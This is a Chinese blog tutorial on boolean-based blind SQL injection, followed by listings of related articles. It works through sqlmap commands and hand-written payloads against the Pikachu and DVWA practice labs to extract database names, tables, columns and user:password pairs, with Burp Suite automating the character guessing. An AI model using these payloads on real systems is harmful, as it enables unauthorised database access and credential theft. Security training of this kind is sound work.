SQL注入之路之二:布尔型(boolean)盲注

已于 2024-01-12 00:28:49 修改
阅读量1.1k 收藏 2
点赞数
分类专栏: # SQL注入 文章标签: 网络安全 sql mysql
于 2023-08-10 17:11:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/132214114
版权

文章目录

布尔型(boolean)盲注

页面不会返回数据库的内容,所以不能使用联合查询将敏感信息显示在页面上,但是可以通过构造SQL语句来获取数据。
输入 SQL 注入检测语句 判断页面是否不一样,如果不一样大概会存在 SQL 注 入漏洞 1’and ‘1’='1 一样 1’and ‘1’='2 不一样,如果输入检测语句页面没有任何改 变可以使用延时语句进行检测 1’and sleep(10)–+ 函数 sleep() 在 mysql 是延时 返回的意思 以秒为单位 sleep(10) 即延时 10 秒执行
在这里插入图片描述

用SQLMap爆破

查询是否存在sqlmap已知的漏洞

sqlmap -u"url" -batch

在这里插入图片描述

获取所有的数据库

sqlmap -u"url" --dbs  -batch

在这里插入图片描述

获取数据库的表名

sqlmap -u"url" -D pikachu --tables  -batch

在这里插入图片描述

获取对应数据库表中的字段名

sqlmap -u"url" -D pikachu -T member --columns  -batch

在这里插入图片描述

获取字段的内容

sqlmap -u"url" -D pikachu -T member -C id,username,pw --dump  -batch

在这里插入图片描述

手工爆破

布尔型盲注入查询长度

要查询当前库名,首先确定要查询数据库的长度,再通过截取字符进行对比

返回正常界面
vince' and length(database())>=7#

在这里插入图片描述

返回错误界面
vince' and length(database())>=7#

在这里插入图片描述
综上可知数据库长度为7

布尔型盲注入获取数据库名

数据库常用字符如下:
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. @_
将这些字符和数据库中的每一个字符进行比较得到最终的数据库名
获取数据库第一个字符,输入vince' and if(substring(database(),1,1)='p',1,0)
在这里插入图片描述
(后续需要一个个爆破较为麻烦,所以建议用burpsuite来进行爆破)

用bp来判断数据库长度

添加变量
语句:vince' and length(database())>=2#
在这里插入图片描述
开始攻击
在这里插入图片描述

获取数据库名

添加变量

kobe' and (select substr(database(),1,1))='k'#

在这里插入图片描述
爆破数据库
在这里插入图片描述

获取表的长度

输入kobe' and length((select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' )) = 1 #
在这里插入图片描述
(个人能力有限,手工注入未能实现,但在dvwa靶场能够成功完成,待后续补充)

DVWA靶场实验:

查询数据库长度

1' and if(length(database())=4,1,0)#

在这里插入图片描述

获取数据库名

数据库常用字符如下:
0123456789ABCDEFGHIJKLMNOPQRSTU
VWXYZabcdefghijklmnopqrstuvwxyz. @_
将这些字符和数据库中的每一个字符进行比较得到最终的数据库名
获取到第一个字段数为d

1' and if(substring(database(),1,1)='d',1,0)#

* SUBSTRING ( expression, start, length )

在这里插入图片描述
但这种方式只是减轻了查询一个字段数的时间,因此我们可以对多个字段同时进行查询
在这里插入图片描述
获取到完整的数据库名
在这里插入图片描述

获取表名

1'and if(substring((select TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA=database() limit 1),1,1)='g',1,0)

在这里插入图片描述
同样一个个查询表名过于麻烦,我们也可以批量处理
在这里插入图片描述

获取users的字段名

1'and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 0,1),1,1)='u',1,0)#
//limit有两个参数,第一个参数表示从第几行数据开始查,第二个参数表示查几条数据,“limit 3,2”表示从第四行数据开始,取两条数据

在这里插入图片描述

获取账号和密码

查询账号和密码的长度
1'and if((SELECT LENGTH(CONCAT(user,0x3a,PASSWORD)) from users limit 1)=38,1,0)

在这里插入图片描述

获取到账号和密码
1'and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 1),1,1)='a',1,0)#

在这里插入图片描述
在这里插入图片描述

摆烂鱼
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入布尔盲注
weixin_44029504的博客
04-16 969
布尔盲注 --------------------------------------------------------------分隔符--------------------------------------------- 布尔盲注原理 布尔盲注是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错至少语法错误会回显错误在页面上)或...
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2138
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
sql注入——布尔注入
Night_time的博客
05-04 5088
sqli-labs-master 闯关游戏第八关为例: 第一步:判断注入点 ?id=1' and 1=2-- - //页面显示异常 ?id=1' and 1=1-- - //页面正常显示 第二步:判断是什么类注入点 构建报错语句: ?id=1' and updatexml(1,0x7e,1)-- - 页面无显示,那就不是报错注入: 那就判断是不是布尔注入,首...
sql注入-布尔盲注
最新发布
WolvenSec的博客
06-02 1242
布尔盲注Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行解释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔盲注或其他的注入思想突破。
sqlmap)【sqli-labs8-10】盲注布尔盲注、时间盲注
07-06 3594
sqlmap-跑盲注靶场】
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 4278
SQL注入篇 - 布尔盲注及延时注入
SQL注入-布尔盲注
acepanhuan的博客
02-10 1678
学习SQL注入方法之盲注
布尔盲注.py_sql盲注python_
10-03
布尔盲注Boolean-Based Blind Injection)是SQL注入攻击的一种类,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
布尔盲注python脚本.zip
12-28
布尔盲注Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
SQL注入思路详解
12-14
3. **布尔盲注Boolean Based Blind)**:通过改变查询的布尔结果来判断数据的真假。 4. **时间盲注(Time Based Blind)**:通过延迟响应时间来推断条件的真假。 对于每种注入方式,其优先级和应用场景不同,攻击...
SQL注入基础整理及Tricks总结1
08-03
联合查询(Union Query)是最常见的SQL注入手法之一,它利用了数据库系统允许将多个查询结果合并成一个结果集的特性。例如,假设存在一个查询语句`SELECT column FROM table WHERE condition`,攻击者可以通过在条件...
信息安全技术:SQL注入的常规分类.pptx
11-01
2. **Boolean注入攻击(布尔盲注)** 布尔盲注通常发生在应用只根据查询结果的真伪返回不同页面的情况下。即使查询失败,也不会显示错误信息。攻击者通过发送一系列测试查询,观察页面的响应时间或内容变化来判断...
布尔SQL盲注注入
m0_64368365的博客
02-20 1598
布尔盲注适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
布尔盲注(结合BurpSuite暴力破解)
weixin_59047731的博客
11-17 735
有些情况下,**开发人员屏蔽了报错信息**,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为**boolean盲注和时间盲注**。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。
sql注入———boolean注入布尔盲注
hintll的博客
09-08 968
sql注入———boolean注入布尔盲注) 这里讲关于sql注入中出现一些过滤的情况之基于布尔注入 如果注入网站的源码中有preg_math函数来过滤了一些注入的命令 列如: if(preg_math(“union|sleep|benchmark/i”,$id)){ exit(“no”); } 这里就过滤掉了union等注入命令 如果页面只返回True和False或yes和no两种类页面 这种情况下就要使用布尔注入的方法来进行sql注入 直接先爆破数据库的名称: ?id=1’ and substr(d
网安入门05-Sql注入布尔盲注&SqlMap)
m0_61499194的博客
12-13 1031
常规:python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" --tables -D security
webug-布尔注入
我只会装360的博客
09-17 862
布尔注入盲注之一,进行sql语句注入后,选择的数据并不能返回到前端。只能利用其他方法来判断,还是简单介绍下学到的知识点。 left(database(),n)    database() 数据库名称 left()函数表示截取数据库左侧n个字符 substr(a,b,c)      从字符串a的b位置开始截取c个字符,当b为负数时截取位置是从字符串a右端向左数b个字符 mid(a,b,c) ...
Boolean注入攻击
天天学安全专属博客
11-06 849
Boolean注入攻击,在线靶场SQL注入漏洞测试(布尔盲注)解题,详细的Boolean注入语句
sqlmap布尔盲注
08-10
布尔盲注是一种利用布尔逻辑运算进行SQL注入的技术。在布尔盲注中,攻击者通过构造特定的SQL语句,通过判断某个条件的真假来获取数据库中的信息。 SQLMap是一款常用的自动化SQL注入工具,可以帮助安全测试人员快速发现和利用SQL注入漏洞。在使用SQLMap进行布尔盲注时,你需要提供目标URL、参数名、注入点等信息。SQLMap将自动发送不同的SQL语句,根据程序返回的结果来判断条件是否成立,并进一步推测数据库中的信息。 下面是使用SQLMap进行布尔盲注的一般步骤: 1. 执行基本扫描:通过指定目标URL和参数名,执行基本的SQL注入扫描,以确定是否存在注入漏洞。 2. 确定注入点:如果基本扫描成功,SQLMap将会尝试确定具体的注入位置。 3. 进行布尔盲注:在确认注入点后,SQLMap将自动生成相应的布尔盲注语句,并发送给目标服务器。通过观察服务器返回的页面内容或响应码,SQLMap将根据条件的真假来判断数据库中的信息。 4. 获取数据库信息:如果布尔盲注成功,SQLMap可以继续获取数据库的表名、列名、数据等敏感信息。 需要注意的是,使用SQL注入工具进行测试时,请确保已经得到合法授权,并遵守法律和道德规范。此外,使用自动化工具可能会对目标服务器造成不必要的负载,所以在使用时应谨慎操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值